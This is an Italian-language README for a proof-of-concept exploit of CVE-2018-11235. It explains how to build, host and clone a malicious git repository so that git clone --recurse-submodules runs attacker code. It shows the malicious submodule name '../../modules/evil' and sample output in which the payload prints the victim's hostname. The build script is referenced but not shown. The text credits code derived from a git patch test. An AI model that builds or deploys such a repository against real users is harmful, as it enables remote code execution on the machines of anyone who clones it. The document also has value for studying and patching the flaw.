
PoC exploit per CVE-2018-11235 che permette RCE su git clone --recurse-submodules
GitHub non mi permette di caricare un repository che sfrutta la vulnerabilità (un buon punto per loro), quindi dovrai costruirlo da te eseguendo lo script build.sh.
Quindi, carica il repository da qualche parte. Quando lo cloni con il flag
--recurse-submodules, viene eseguito lo script malevolo:
$ git clone --recurse-submodules repo dest_dir
Cloning into 'dest_dir'...
done.
Submodule 'Spoon-Knife' (https://github.com/octocat/Spoon-Knife) registered for path 'Spoon-Knife'
Submodule '../../modules/evil' (https://github.com/octocat/Spoon-Knife) registered for path 'evil'
Cloning into '/snip/dest_dir/Spoon-Knife'...
Submodule path 'Spoon-Knife': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Here is your hostname: snip
Submodule path 'evil': checked out 'd0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9'
Codice derivato dalla git patch di @peff (cerca il file di test t/t7415-submodule-names.sh).
Pertanto, questo repository è pubblicato sotto la GNU General Public License versione 2.
Correzione aggiuntiva per versioni precedenti di git per gentile concessione di @atorralba (dettagli in questo post).